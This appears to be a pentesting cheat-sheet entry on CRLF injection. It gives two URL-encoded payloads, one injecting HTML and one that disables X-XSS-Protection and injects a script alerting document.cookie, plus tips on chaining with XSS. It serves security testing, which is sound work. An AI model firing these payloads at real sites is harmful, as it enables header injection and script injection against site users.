CRLF Injection
#payloads#injection#headers
Commands
%0d%0a%0d%0a%3Ch1%3ECoffinxp%3C%2Fh1%3E%0A%3Cp%3ECRLF%20Injection%20PoC%3C%2Fh1%3E
Basic injection payload to test for CRLF vulnerabilities, adding extra headers or HTML.
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
CRLF injection testing to bypass security headers like X-XSS-Protection and inject malicious scripts.
Tips & Best Practices
Always encode your payloads properly to prevent breaking the target's application
Use tools like Burp Suite to inject payloads into headers and parameters effectively
Test various headers and parameters for injection points, as not all inputs are sanitized the same way
Combine CRLF injection with other vulnerabilities (e.g., XSS, open redirect) for more impactful exploitation
Document all testing results carefully, noting which headers or inputs were vulnerable